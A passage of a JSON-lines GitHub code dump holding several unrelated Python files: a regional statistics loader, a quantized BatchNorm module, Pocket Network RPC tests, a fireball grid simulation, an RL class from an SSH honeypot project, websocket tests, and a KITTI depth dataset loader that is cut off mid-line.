population of all Hesse regions\n '''\n \n for _ in range(3): # Database may throw an error on the first query try\n try:\n q = Query.all_regions(parent='06')\n stat = q.add_field(selected_stats)\n\n data = q.results(verbose_enums=True, add_units = True)\n break\n except:\n continue\n\n # for some reason entries are produced twice; remove them\n data.drop_duplicates(inplace=True)\n \n data, unit = data[['name', 'year', 'id', selected_stats]], data[selected_stats+'_unit'].iloc[0]\n\n if norm != 0:\n # Normalize dataframe data here by modifying selected_stats with the population dataframe\n df = pd.merge(data, pop, how='left')\n df[[selected_stats]] = df[selected_stats] / df['BEVSTD'] * norm\n \n data = df[['name', 'year', 'id', selected_stats]]\n \n return data, unit\n\ndef get_statistics_description(selected_stats=selected_stats):\n '''\n get the description string for statistics 'selected_stats'\n '''\n q = Query.all_regions(parent='06')\n stat = q.add_field(selected_stats)\n return stat.description()\n\n\n# # load geoJSON data\n\n# the geoJSON file was obtained from http://opendatalab.de/projects/geojson-utilities/ \n# (contains only data for Hessen on level NUTS3)\ngeojson_data = json.load(open('data/landkreise_simplify200.geojson','r'))\n\n# set property 'name' for the county name to make it consistent with datenguide data\nfor feature in geojson_data['features']:\n feature['properties']['name'] = feature['properties']['BEZ']\n\n# write to `geo_data` with identifier key named as `id` \n# TODO: why introduce a new variable here?\n\ngeo_data = {'features':[], 'id':[]}\nfor f in geojson_data['features']:\n f.update(id=f['properties']['AGS']) #f['properties']['GEN'])\n geo_data['features'].append(f)\n\n\n# # define and load all statistics that will be available in the app\n\n# 0. stats for tests:\n#stat_ids = ['AI1903', 'AI1904', 'BEV083']\n#normalize = [0, 1, 1000]\n\n# 1. Environmental\nstat_ids = ['AI1301', 'AI0106', 'AI0107', 'AI0109', 'AI0113', 'AI1902', 'AI1903', 'AI1905', 'AI1901', 'AI1904']\n# only without normalization\nnormalize = listofzeros = [0] * len(stat_ids)\n\n# 2. Population:\n#stat_ids = ['AI0701', 'BEV083', 'BEV084', 'BEV085', 'BEV086']\n#normalize = [0, 1000, 1000, 1000, 1000]\n\nstat_descriptions = [get_statistics_description(si) for si in stat_ids]\nstat_tuple = tuple(zip(stat_descriptions, stat_ids))\nstat_dict = dict((y, x) for x, y in stat_tuple)\n\nnorm = 0\nchoro_data_complete, units = dict(), dict()\nfor ix in range(len(stat_ids)):\n st = stat_ids[ix]\n norm = normalize[ix]\n choro_data_complete[st], units[st] = get_data_all_years(st, norm, pop)\n\nc = choro_data_complete[stat_ids[0]] # take one statistics data set for generating name/id mapping\nid_to_name = {ids: c.loc[c['id']==ids, 'name'][0] for ids in c['id'].unique()}","repo_name":"CorrelAid/cax-challenge-rhein-main","sub_path":"load_stats.py","file_name":"load_stats.py","file_ext":"py","file_size_in_byte":4789,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"72271400167","text":"import torch\nfrom changan_plugin_pytorch.nn import qat\nfrom changan_plugin_pytorch.qtensor import QTensor\n\nfrom .functional import conv2d\n\n\nclass BatchNorm2d(torch.nn.Module):\n _QAT_MODULE = qat.BatchNorm2d\n\n def __init__(\n self,\n num_features,\n eps=1e-5,\n momentum=0.1,\n affine=True,\n track_running_stats=True,\n out_dtype=\"qint8\",\n ):\n super().__init__()\n self.num_features = num_features\n self.eps = eps\n self.momentum = momentum\n self.affine = affine\n self.track_running_stats = track_running_stats\n self.out_dtype = out_dtype\n\n self.register_buffer(\n \"weight\", torch.ones(self.num_features, 1, 1, 1)\n ) # dummy\n self.register_buffer(\n \"weight_scale\", torch.ones((self.num_features,))\n ) # lambda / sigma\n self.register_buffer(\n \"weight_zero_point\",\n torch.zeros(self.num_features, dtype=torch.int64),\n )\n self.register_buffer(\n \"zero_point\", torch.zeros(self.num_features, dtype=torch.int64)\n )\n self.register_buffer(\n \"bias\", torch.zeros(num_features)\n ) # -lambda * mean / sigma + beta\n self.register_buffer(\"scale\", torch.ones(1)) # out_scale\n self.register_buffer(\"bias_scale\", torch.ones(num_features))\n self.register_buffer(\n \"bias_zero_point\", torch.zeros(num_features, dtype=torch.int64)\n )\n\n @torch.no_grad()\n def forward(self, input):\n out, dequant_out_scale = conv2d(\n input=input.int_repr(),\n weight=self.weight,\n bias=self.bias,\n sumin=None,\n stride=(1, 1),\n padding=(0, 0),\n dilation=(1, 1),\n groups=self.num_features,\n padding_mode=\"zeros\",\n activation=\"\",\n input_scale=input.q_scale(),\n input_zero_point=input.q_zero_point(),\n input_dtype=input.dtype,\n weight_scale=self.weight_scale,\n weight_zero_point=self.weight_zero_point,\n weight_dtype=\"qint8\",\n bias_scale=self.bias_scale,\n bias_zero_point=self.bias_zero_point,\n bias_dtype=\"qint32\",\n sumin_scale=None,\n sumin_zero_point=None,\n sumin_dtype=None,\n scale=self.scale,\n zero_point=self.zero_point,\n dtype=self.out_dtype,\n )\n return QTensor(out, self.scale, self.out_dtype, per_channel_axis=-1)\n\n @classmethod\n def from_float(cls, mod):\n assert type(mod) == cls._QAT_MODULE, (\n \"qat.\"\n + cls.__name__\n + \".from_float only works for \"\n + cls._QAT_MODULE.__name__\n )\n activation_post_process = mod.activation_post_process\n out_dtype = (\n activation_post_process.dtype\n if activation_post_process is not None\n else None\n )\n assert out_dtype is not None\n qbn = cls(\n num_features=mod.bn.num_features,\n eps=mod.bn.eps,\n momentum=mod.bn.momentum,\n affine=mod.bn.affine,\n track_running_stats=True,\n out_dtype=out_dtype,\n )\n with torch.no_grad():\n running_std = torch.sqrt(mod.bn.running_var + mod.bn.eps)\n qbn.weight_scale.copy_(torch.abs(mod.bn.weight) / running_std)\n qbn.weight.copy_(\n (mod.bn.weight / running_std).reshape(-1, 1, 1, 1)\n )\n qbn.bias.copy_(\n -mod.bn.weight * mod.bn.running_mean / running_std\n + mod.bn.bias\n )\n qbn.scale.copy_(activation_post_process.scale)\n return qbn\n","repo_name":"xingyun-xy/cap","sub_path":"changan_plugin_pytorch/nn/quantized/batchnorm.py","file_name":"batchnorm.py","file_ext":"py","file_size_in_byte":3788,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10072803163","text":"import pytest\n\nfrom pokt.rpc.data.network import (\n get_height,\n get_supply,\n get_all_params,\n get_upgrade,\n get_supported_chains,\n get_param,\n get_version,\n get_state,\n)\nfrom pokt.rpc.models import (\n QuerySupplyResponse,\n AllParams,\n QueryHeightResponse,\n QuerySupplyResponse,\n QuerySupportedChainsResponse,\n Upgrade,\n StateResponse,\n IntParam,\n FloatParam,\n BoolParam,\n StrParam,\n SupportedBlockchainsParam,\n FeeMultiplierParam,\n UpgradeParam,\n ACLParam,\n)\n\n\ndef test_get_height_returns_nonzero_int(rpc_url, session):\n height = get_height(rpc_url, session)\n assert isinstance(height, QueryHeightResponse)\n assert height.height > 0\n\n\ndef test_get_version(rpc_url, session):\n version_resp = get_version(rpc_url, session)\n assert isinstance(version_resp, str)\n\n\ndef test_get_supply(rpc_url, session, height):\n supply_resp = get_supply(rpc_url, height=height, session=session)\n assert isinstance(supply_resp, QuerySupplyResponse)\n\n\ndef test_get_all_params(rpc_url, session, height):\n params_resp = get_all_params(rpc_url, height=height, session=session)\n assert isinstance(params_resp, AllParams)\n\n\ndef test_get_upgrade(rpc_url, session, height):\n upgrade_resp = get_upgrade(rpc_url, height=height, session=session)\n assert isinstance(upgrade_resp, Upgrade)\n\n\ndef test_get_supported_chains(rpc_url, session, height):\n supported_chains_resp = get_supported_chains(\n rpc_url, height=height, session=session\n )\n assert isinstance(supported_chains_resp, QuerySupportedChainsResponse)\n\n\ndef test_get_state(rpc_url, session, height):\n state_resp = get_state(rpc_url, height=height, session=session)\n assert isinstance(state_resp, StateResponse)\n\n\n@pytest.mark.parametrize(\n (\"param_name\", \"param_type\"),\n [\n (\"application/MaxApplications\", IntParam),\n (\"application/AppUnstakingTime\", IntParam),\n (\"application/MaximumChains\", IntParam),\n (\"application/StabilityAdjustment\", IntParam),\n (\"application/BaseRelaysPerPOKT\", IntParam),\n (\"application/ApplicationStakeMinimum\", IntParam),\n (\"pos/DAOAllocation\", IntParam),\n (\"pos/StakeMinimum\", IntParam),\n (\"pos/MaximumChains\", IntParam),\n (\"pos/RelaysToTokensMultiplier\", IntParam),\n (\"pos/MaxJailedBlocks\", IntParam),\n (\"pos/MaxValidators\", IntParam),\n (\"pos/UnstakingTime\", IntParam),\n (\"pos/DowntimeJailDuration\", IntParam),\n (\"pos/ProposerPercentage\", IntParam),\n (\"pos/BlocksPerSession\", IntParam),\n (\"pos/MaxEvidenceAge\", IntParam),\n (\"pos/SignedBlocksWindow\", IntParam),\n (\"pocketcore/SessionNodeCount\", IntParam),\n (\"pocketcore/ClaimSubmissionWindow\", IntParam),\n (\"pocketcore/ReplayAttackBurnMultiplier\", IntParam),\n (\"pocketcore/ClaimExpiration\", IntParam),\n (\"pocketcore/MinimumNumberOfProofs\", IntParam),\n (\"auth/MaxMemoCharacters\", IntParam),\n (\"auth/TxSigLimit\", IntParam),\n (\"pos/StakeDenom\", StrParam),\n (\"gov/daoOwner\", StrParam),\n (\"pos/SlashFractionDoubleSign\", FloatParam),\n (\"pos/SlashFractionDowntime\", FloatParam),\n (\"pos/MinSignedPerWindow\", FloatParam),\n (\"application/ParticipationRateOn\", BoolParam),\n (\"pocketcore/SupportedBlockchains\", SupportedBlockchainsParam),\n (\"auth/FeeMultipliers\", FeeMultiplierParam),\n (\"gov/acl\", ACLParam),\n (\"gov/upgrade\", UpgradeParam),\n ],\n)\ndef test_get_params(rpc_url, session, height, param_name, param_type):\n param_resp = get_param(rpc_url, param_name, height=height, session=session)\n assert isinstance(param_resp, param_type)\n","repo_name":"pokt-foundation/pypokt","sub_path":"tests/test_rpc_network.py","file_name":"test_rpc_network.py","file_ext":"py","file_size_in_byte":3716,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"32807674412","text":"# 입력값\n\nN, M, K = map(int, input().split())\n\nfireball = []\nfor _ in range(M) :\n r, c, m, s, d = list(map(int, input().split()))\n fireball.append([r, c, m, s, d])\n\nfire_map = [[[] for _ in range(N)] for _ in range(N)]\n\ndx = [-1, -1, 0, 1, 1, 1, 0, -1]\ndy = [0, 1, 1, 1, 0, -1, -1, -1]\n\n# 파이어볼 이동!\n\nfor _ in range(K) :\n while fireball :\n sr, sc, sm, ss, sd = fireball.pop(0)\n nr = (sr + ss * dx[sd]) % N\n nc = (sc + ss * dy[sd]) % N\n fire_map[nr][nc].append([sm, ss, sd])\n\n for x in range(N):\n for y in range(N) :\n # 파이어볼이 2개 이상인 경우\n if len(fire_map[x][y]) > 1 :\n sum_m, sum_s, cnt_odd, cnt_even, cnt = 0, 0, 0, 0, len(fire_map[x][y])\n\n while fire_map[x][y] :\n bm, bs, bd = fire_map[x][y].pop(0)\n sum_m += bm\n sum_s += bs\n\n if bd % 2 == 0 :\n cnt_even += 1\n else :\n cnt_odd += 1\n\n if cnt_even == cnt or cnt_odd == cnt :\n nd = [0, 2, 4, 6]\n else :\n nd = [1, 3, 5, 7]\n\n if sum_m // 5 != 0 :\n for d in nd :\n fireball.append([x, y, sum_m//5, sum_s//cnt, d])\n # 파이어볼 1개인 경우\n if len(fire_map[x][y]) == 1 :\n fireball.append([x, y] + fire_map[x][y].pop())\n\nprint(sum([x[2] for x in fireball]))\n","repo_name":"uss96/CodingTest","sub_path":"삼전코테/백준 삼전 코테 문제/마법사 상어와 파이어볼/마법사 상어와 파이어볼 (정답 참고).py","file_name":"마법사 상어와 파이어볼 (정답 참고).py","file_ext":"py","file_size_in_byte":1540,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22213744255","text":"import numpy as np\r\nimport pickle\r\n\r\nclass play:\r\n def __init__(self,model, weights, sequence_length=10,cmd2number_reward = \"\",GAMMA=0.9):\r\n self.model = model\r\n self.weights = weights\r\n self.GAMMA = GAMMA\r\n\r\n self.cmds = 0\r\n self.state = np.zeros(sequence_length)\r\n self.state_index = 0\r\n\r\n if isinstance(cmd2number_reward, str):\r\n #if string load from file\r\n self.cmd2number_reward = pickle.load(open(cmd2number_reward,\"rb\"))\r\n else:\r\n # if dictionary\r\n self.cmd2number_reward = cmd2number_reward\r\n\r\n self.featureExpectations = np.zeros(len(weights))\r\n self.last_reward = None\r\n self.ready = False\r\n\r\n def get_command(self,cmd):\r\n # Check if the command is known\r\n if cmd in self.cmd2number_reward:\r\n cmd_num, reward = self.cmd2number_reward[cmd]\r\n else:\r\n cmd_num, reward = self.cmd2number_reward[\"unknown\"]\r\n\r\n if self.state_index >= 1:\r\n if self.state_index == self.sequence_length:\r\n # The oldest command is erased and the newest is introduced\r\n np.roll(self.state, 1)\r\n self.state[self.sequence_length - 1] = cmd_num\r\n else:\r\n # The next command is added to the state\r\n self.state[self.state_index] = cmd_num\r\n self.state_index = self.state_index + 1\r\n\r\n\r\n # 56 is the \"exit\" command\r\n if cmd_num == 56:\r\n # The state is reset\r\n self.state = np.zeros(self.sequence_length)\r\n self.state_index = 0\r\n else:\r\n # The state is a sequence of the last params[\"sequence_length\"] commands given\r\n # Here the first command is inputed into the state\r\n self.state[self.state_index] = self.cmd_num\r\n self.state_index = self.state_index + 1\r\n self.cmds += 1\r\n\r\n if len(self.state.shape) == 1:\r\n batch_state = np.expand_dims(self.state, axis=0)\r\n else:\r\n batch_state = self.state\r\n # Choose action.\r\n action = (np.argmax(self.model.predict(batch_state, batch_size=1)[0]))\r\n\r\n if self.last_reward is not None:\r\n if self.cmds > 100:\r\n self.featureExpectations += (self.GAMMA ** (self.cmds - 101)) * np.array(state)\r\n # print (\"Feature Expectations :: \", featureExpectations)\r\n # Tell us something.\r\n if self.cmds % 2000 == 0:\r\n print(\"Current distance: %d frames.\" % self.cmds)\r\n print(\"featureExpectations ready\")\r\n self.ready = True\r\n self.last_reward = reward\r\n","repo_name":"adpauna/irassh","sub_path":"irassh/rl/playing.py","file_name":"playing.py","file_ext":"py","file_size_in_byte":2735,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"14819332333","text":"import pytest\nfrom channels.routing import URLRouter\nfrom channels.testing import WebsocketCommunicator\nfrom django.core.cache import cache\n\nfrom boards.routing import websocket_urlpatterns\n\n\n@pytest.mark.asyncio\nclass TestBoardConsumer:\n async def test_session_connect_disconnect_websocket_message(self, board):\n application = URLRouter(websocket_urlpatterns)\n board_group_name = f\"board-{board.slug}\"\n assert await cache.aget(board_group_name) is None\n\n communicator1 = WebsocketCommunicator(application, f\"/ws/boards/{board.slug}/\")\n await communicator1.connect()\n message = await communicator1.receive_from()\n assert \"session_connected\" in message\n assert '\"sessions\": 1' in message\n assert await cache.aget(board_group_name) == 1\n\n communicator2 = WebsocketCommunicator(application, f\"/ws/boards/{board.slug}/\")\n await communicator2.connect()\n message = await communicator1.receive_from()\n assert \"session_connected\" in message\n assert '\"sessions\": 2' in message\n assert await cache.aget(board_group_name) == 2\n\n await communicator2.disconnect()\n message = await communicator1.receive_from()\n assert \"session_disconnected\" in message\n assert '\"sessions\": 1' in message\n assert await cache.aget(board_group_name) == 1\n\n await communicator1.disconnect()\n assert await cache.aget(board_group_name) is None\n","repo_name":"oscarsiles/jotlet","sub_path":"boards/tests/test_consumers.py","file_name":"test_consumers.py","file_ext":"py","file_size_in_byte":1465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36595417634","text":"import glob\nimport torch.multiprocessing\n\nimport numpy as np\nimport os\n\nfrom torch.utils.data import Dataset\n\nfrom dataset.original_method.kitti_dataset_utils import \\\n pose_from_oxts_packet, read_calib_file, transform_from_rot_trans\nfrom dataset.utils.image import load_image\nfrom dataset.utils.transforms import to_tensor_transforms\nfrom dataset.data_prepocess.Matrix_Angle import R_to_angle\n\n########################################################################################################################\ntorch.multiprocessing.set_sharing_strategy('file_system')\nos.environ['CUDA_VISIBLE_DEVICES'] = \"0,1,2,3\"\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n#print(\"using {} device.\".format(device))\n\n# Cameras from the stero pair (left is the origin)\nIMAGE_FOLDER = {\n 'left': 'image_02',\n 'right': 'image_03',\n}\n'''\nIMAGE_FOLDER = {\n 'left': 'image_02',\n}'''\n# Name of different calibration files\nCALIB_FILE = {\n 'cam2cam': 'calib_cam_to_cam.txt',\n 'velo2cam': 'calib_velo_to_cam.txt',\n 'imu2velo': 'calib_imu_to_velo.txt',\n}\nPNG_DEPTH_DATASETS = ['groundtruth']\nOXTS_POSE_DATA = 'oxts'\n\n\n########################################################################################################################\n#### FUNCTIONS\n########################################################################################################################\ndef extract_idx(path):\n day = path.split('/')[-4].split('_')\n index = path.split('/')[-1].split('.')[0]\n index = int(day[1] + day[2] + day[4] + index)\n return index\n\n\n'''def extract_idx(path):\n day = path.split('/')[-4].split('_')\n index = path.split('/')[-1].split('.')[0]\n index = int(day[0] + day[1] + day[2] + day[4] + index) 位数大于19位报错\n return index'''\n\n\ndef find_path(idx):\n roo_dir = '/home/zhanl/data/kitti/raw//'\n seq = str(idx)\n if idx // 10 ** 16 > 9:\n i = 1\n seq1 = seq[0:2] # 10\n else:\n i = 0\n seq1 = '0' + seq[0] # 09\n seq2 = seq[i + 1:i + 3] # 日期\n seq3 = seq[i + 3:i + 7]\n seq4 = seq[i + 7:i + 17]\n path = roo_dir + '2011_' + seq1 + '_' + seq2 + '/' + '2011_' + seq1 + '_' + seq2 + '_drive_' + seq3 + '_sync/image_02/data/' + seq4 + '.png'\n return path\n\n\ndef read_npz_depth(file, depth_type):\n \"\"\"Reads a .npz depth map given a certain depth_type.\"\"\"\n depth = np.load(file)[depth_type + '_depth'].astype(np.float32)\n return np.expand_dims(depth, axis=2)\n\n\ndef read_png_depth(file):\n \"\"\"Reads a .png depth map.\"\"\"\n depth_png = np.array(load_image(file), dtype=int)\n assert (np.max(depth_png) > 255), 'Wrong .png depth file'\n depth = depth_png.astype(np.float) / 256.\n depth[depth_png == 0] = -1. # 这里没有深度的像素值为什么要改成-1:归一化到[-1,1]的区间\n return np.expand_dims(depth, axis=2)\n\n\n########################################################################################################################\n#### DATASET\n########################################################################################################################\n\n\nclass KITTIDataset(Dataset):\n \"\"\"\n KITTI dataset class.\n\n Parameters\n ----------\n root_dir : str\n Path to the dataset\n file_list : str\n Split file, with paths to the images to be used example: 2011_09_26/2011_09_26_drive_0009_sync/0000000386.png\n train : bool\n True if the dataset will be used for training\n data_transform : Function\n Transformations applied to the sample\n depth_type : str\n Which depth type to load 类别分两种:'velodyne'和'groundtruth'(带注释)\n with_pose : bool\n True if returning ground-truth pose\n back_context : int\n Number of backward frames to consider as context ??? 上下文信息指的一般��当前像素点周围像素的信息,上下文特征即为当前像素及其周边像素之间的某种联系\n forward_context : int\n Number of forward frames to consider as context ??? 这里的上下文消息可以理解为相邻帧吗??\n strides : tuple\n List of context strides\n with_dynamic : bool\n True if return a dynamic dataset\n dynamic_list: list\n List included all the index of dynamic image (和file_list的区别是file_list是文件路径,dynamic是存储了动态图片路径的列表,和后文的self.path类似\n\n \"\"\"\n\n def __init__(self, file_list, dynamic_list, train=True, with_dynamic=False,\n data_transform=to_tensor_transforms, depth_type='groundtruth', with_pose=False,\n backward_context=0, forward_context=0, strides=(1,)):\n # Assertions\n assert backward_context >= 0 and forward_context >= 0, 'Invalid contexts'\n\n self.backward_context = backward_context\n self.backward_context_paths = [] # 存的id\n self.forward_context = forward_context\n self.forward_context_paths = []\n\n self.with_context = (backward_context != 0 or forward_context != 0)\n # file_list = \"/home/zhanl/data/eigen_zhou_files.txt\",self.split=eigen_zhou_files\n self.split = file_list.split('/')[-1].split('.')[0]\n\n self.train = train\n self.dynamic_index = dynamic_list\n self.data_transform = data_transform\n\n self.with_dynamic = with_dynamic # 判断是否是动态\n\n self.depth_type = depth_type\n self.with_depth = depth_type is not '' and depth_type is not None # 即depth_type非空即为True\n self.with_pose = with_pose\n\n # 这里的cache的理解:保存了上一个数据的读取记录\n self._cache = {} # 存储的是最后以个文件夹路径的文件数量(每个序列参照深度图数量)\n self.pose_cache = {}\n self.oxts_cache = {}\n self.calibration_cache = {}\n self.imu2velo_calib_cache = {}\n self.sequence_origin_cache = {}\n\n with open(file_list, \"r\") as f:\n data = f.readlines() # data是列表类型的数据,一行代表一个元素\n\n self.paths = []\n\n if self.with_dynamic:\n data = self.dynamic_index # 这里不需要筛选出来没有对应深度信息的rgb图,因为dynamic_list就是从总数据集里挑选出来的已经是满足了条件的\n\n # Get file list from data:需要编辑一个包含了训练集中所有数据的路径和文件名的txt文件 (这里可以再加上pose文件路径或者pose每次通过计算得到)\n for i, fname in enumerate(data):\n # 可以理解为/home/zhanlei/data/kitti-raw/2011_10_03/2011_10_03_drive_0027_sync/image_02/data/0000000000.png\n #path = os.path.join(root_dir, fname.split()[0]) # 当split括号里不设置符号时,默认一个空格就是一次断开\n path = fname.split()[0]\n #if os.path.exists(path) and not (fname in self.dynamic_index): # 筛除掉动态列表里的帧?\n if os.path.exists(path):\n if not self.with_depth: # 不需要深度信息\n self.paths.append(path)\n else: # 如果要输入深度图片的话,再添加一个深度路径\n # Check if the depth file exists\n depth = self._get_depth_file(path) # depth是该rgb图片对应的深度图路径,但也有可能找不到对应的深度图\n if depth is not None and os.path.exists(\n depth): # 如果找不到当前rgb对应的depth即不把该rgb加入到路径中,即解决了深度图要比rgb图少十帧的问题\n self.paths.append(path)\n # 得到n个rgb图片路径(这里不需要设置一个深度图路径列表,因为深度图可直接转换rgb途径读取)\n\n # If using context, filter file list\n if self.with_context:\n paths_with_context = []\n # 当strides为(1,)元组时,下面的循环只能执行一次,且stride=1\n for stride in strides:\n for idx, file in enumerate(self.paths):\n # 这里动态池的前后帧筛选方式不一样,应该是直接在list里面往前数一个而不是idx-1\n backward_context_idxs, forward_context_idxs = \\\n self._get_sample_context(\n file, backward_context, forward_context, stride)\n if backward_context_idxs is not None and forward_context_idxs is not None:\n # 如果前一帧存在后一帧也存在的话:可理解为默认删除每个序列的首尾两帧\n paths_with_context.append(self.paths[idx])\n self.forward_context_paths.append(forward_context_idxs)\n # self.backward_context_paths.append(backward_context_idxs[::-1]) # backward合集里面是按照id递减的形式排序的,为了读取时可以顺序读取这里进行了一个顺序的调换(变成了升序的)\n self.backward_context_paths.append(backward_context_idxs)\n self.paths = paths_with_context # 只记录有上下文信息(前后帧)的帧的路径\n # 得到了当前帧的前后帧id\n\n ####################################################################################################################\n # @为python装饰器:可以让某个函数在不改动代码的基础上增加额外的功能。比如函数的嵌套:staticmethod(func)\n @staticmethod\n def _get_next_file(idx, file):\n # 返回的是当前文件向后数idx个数字后的文件路径?之前的路径怎么读取\n \"\"\"Get next file given next idx and current file.\"\"\"\n base, ext = os.path.splitext(os.path.basename(file)) # base=0000000000,ext=.png\n return os.path.join(os.path.dirname(file), str(idx).zfill(len(base)) + ext) # zfill是向右对齐添零\n\n @staticmethod\n def _get_parent_folder(image_file):\n \"\"\"Get the parent folder from image_file.\"\"\"\n return os.path.abspath(os.path.join(image_file, \"../../../../..\")) # 往上数第四层文件夹的路径:这里的用法还存在疑问\n\n @staticmethod\n def _get_intrinsics(image_file, calib_data):\n \"\"\"Get intrinsics from the calib_data dictionary.\"\"\"\n for cam in ['left', 'right']:\n # Check for both cameras, if found replace and return intrinsics\n if IMAGE_FOLDER[cam] in image_file:\n # 返回的是cam_cam的配准文件中P_rect_02和P_rect_03两行信息即uv坐标系转到相机2、3坐标系的内参\n return np.reshape(calib_data[IMAGE_FOLDER[cam].replace('image', 'P_rect')], (3, 4))[:, :3]\n\n @staticmethod\n def _read_raw_calib_file(folder):\n # 这里读取的不同的相机坐标系之间的配准文件\n \"\"\"Read raw calibration files from folder.\"\"\"\n return read_calib_file(os.path.join(folder, CALIB_FILE['cam2cam']))\n\n ########################################################################################################################\n #### DEPTH\n ########################################################################################################################\n\n def _read_depth(self, depth_file):\n \"\"\"Get the depth map from a file.\"\"\"\n if self.depth_type in ['velodyne']:\n return read_npz_depth(depth_file, self.depth_type)\n elif self.depth_type in ['groundtruth']:\n return read_png_depth(depth_file)\n else:\n raise NotImplementedError(\n 'Depth type {} not implemented'.format(self.depth_type))\n\n def _get_depth_file(self, image_file):\n \"\"\"Get the corresponding depth file from an image file.\"\"\"\n # 这里有个问题是depth和image图片总数不是一一对应的(depth一般从5开始而且每个时间序列的结尾也比rgb少五张)\n for cam in ['left', 'right']:\n if IMAGE_FOLDER[cam] in image_file:\n depth_file = image_file.replace(\n IMAGE_FOLDER[cam] + '/data', 'proj_depth/{}/{}'.format(\n self.depth_type, IMAGE_FOLDER[cam]))\n depth_file = depth_file.replace(\n 'raw', 'depth')\n if self.depth_type not in PNG_DEPTH_DATASETS:\n depth_file = depth_file.replace('png', 'npz')\n return depth_file\n\n # sample是一个字典类型的数据,包含三个键id、图像文件名、图像。\n def _get_sample_context(self, sample_name, backward_context, forward_context, stride=1):\n \"\"\"\n Get a sample context\n\n Parameters\n ----------\n sample_name : str\n Path + Name of the sample\n backward_context : int = 1\n Size of backward context\n forward_context : int = 1\n Size of forward context\n stride : int (步长) = 1\n Stride value to consider when building the context\n\n Returns\n -------\n backward_context : list of int\n List containing the indexes for the backward context\n forward_context : list of int\n List containing the indexes for the forward context\n \"\"\"\n base, ext = os.path.splitext(os.path.basename(sample_name))\n parent_folder = os.path.dirname(sample_name)\n \"\"\"不知道为啥做了下面这些修改后,代码运行的速度特别慢\n for cam in ['left', 'right']:\n if IMAGE_FOLDER[cam] in parent_folder:\n parent_folder_depth = parent_folder.replace(\n IMAGE_FOLDER[cam] + '/data', 'proj_depth/{}/{}'.format(\n self.depth_type, IMAGE_FOLDER[cam]))\n parent_folder_depth = parent_folder_depth.replace(\n 'raw', 'depth')\"\"\"\n # current_idx\n c_idx = int(base) # base = 0000000005, c_idx = 5\n\n # Check number of files in folder(这里也要改成depth文件夹中的数量)\n if parent_folder in self._cache:\n max_num_files = self._cache[parent_folder]\n else:\n max_num_files = len(glob.glob(os.path.join(parent_folder, '*' + ext))) - 5 # 当前目录下全部文件数量,减5的原因是深度图最后一张图的下标要比rgb最后一张图的小标小5\n self._cache[parent_folder] = max_num_files # idx最大的深度图要比rgb少5\n\n # Check bounds\n if (c_idx - backward_context * stride) < 4 or (\n c_idx + forward_context * stride) > max_num_files:\n return None, None\n\n # Backward context:创造一个当前帧对应的前馈图像集合,这里如果设置容量为1的话是否就满足了相似度的计算\n b_idx = c_idx\n backward_context_idxs = []\n # 这里的while改成if,这样就只循环一次,context只包含了一张图像:\n if len(backward_context_idxs) < backward_context and b_idx > 5: # 考虑depth是从第五张开始计数的情况\n # while len(backward_context_idxs) < backward_context and c_idx > 0:\n #if b_idx > 5:\n b_idx -= stride\n else:\n b_idx += stride # 如果没有前缀的话(比如第一张图像),那就让前缀的图像id=后缀的图像id\n filename = self._get_next_file(b_idx, sample_name)\n if os.path.exists(filename):\n backward_context_idxs.append(b_idx) # 记录了前stride帧的id\n\n # Forward context:创造一个当前帧对应的后馈图像集合\n f_idx = c_idx\n forward_context_idxs = []\n if len(forward_context_idxs) < forward_context and f_idx < max_num_files-1:\n # while len(forward_context_idxs) < forward_context and c_idx < max_num_files:\n #if f_idx < max_num_files:\n f_idx += stride\n else:\n f_idx -= stride # 如果是最后一张图像,那就让后缀id=前缀id\n filename = self._get_next_file(f_idx, sample_name)\n if os.path.exists(filename):\n forward_context_idxs.append(f_idx) # 记录了后stride帧的id\n\n # 返回的是前后帧列表(列表中只包含了图片对应的index比如说0000000000)\n return backward_context_idxs, forward_context_idxs\n\n def _get_context_files(self, sample_name, idxs):\n \"\"\"\n Returns image and depth (and pose) context files\n 即每一帧都得有对应的前后帧\n Parameters\n ----------\n sample_name : str\n Name of current sample\n idxs : list of idxs\n Context indexes\n\n Returns\n -------\n image_context_paths : list of str\n List of image names for the context\n depth_context_paths : list of str\n List of depth names for the context\n \"\"\"\n image_context_paths = [self._get_next_file(i, sample_name) for i in idxs]\n if self.with_depth:\n depth_context_paths = [self._get_depth_file(f) for f in image_context_paths]\n return image_context_paths, depth_context_paths\n else:\n return image_context_paths, None\n # 返回的是前后帧(上下文)的图片路径\n # 还要考虑前后帧对应的姿态信息\n\n ########################################################################################################################\n #### POSE:要考虑的是以哪个点为原点\n ########################################################################################################################\n\n def _get_imu2cam_transform(self, image_file):\n \"\"\"Gets the transformation between IMU and camera from an image file\"\"\"\n parent_folder = self._get_parent_folder(image_file)\n if image_file in self.imu2velo_calib_cache:\n return self.imu2velo_calib_cache[image_file]\n\n cam2cam = read_calib_file(os.path.join(parent_folder, CALIB_FILE['cam2cam']))\n imu2velo = read_calib_file(os.path.join(parent_folder, CALIB_FILE['imu2velo']))\n velo2cam = read_calib_file(os.path.join(parent_folder, CALIB_FILE['velo2cam']))\n\n velo2cam_mat = transform_from_rot_trans(velo2cam['R'], velo2cam['T'])\n imu2velo_mat = transform_from_rot_trans(imu2velo['R'], imu2velo['T'])\n # 摄像机00矫正:3x3 纠正旋转矩阵(使图像平面共面),可理解转换到2D坐标系中必须进行的\n cam_2rect_mat = transform_from_rot_trans(cam2cam['R_rect_00'], np.zeros(3))\n cam0_cam2_rec_mat = np.vstack((cam2cam['P_rect_02'].reshape(3, 4), [0, 0, 0, 1])) # P_rect_xx本来就是3x4的矩阵\n cam0_cam2_mat = transform_from_rot_trans(cam2cam['R_02'], cam2cam['T_02']) # cam0转到cam2坐标系下\n\n # imu2cam = cam_2rect_mat @ velo2cam_mat @ imu2velo_mat # 这里得到的是相机0对应的图像坐标系下的的转换矩阵\n imu2cam = cam0_cam2_mat @ velo2cam_mat @ imu2velo_mat # 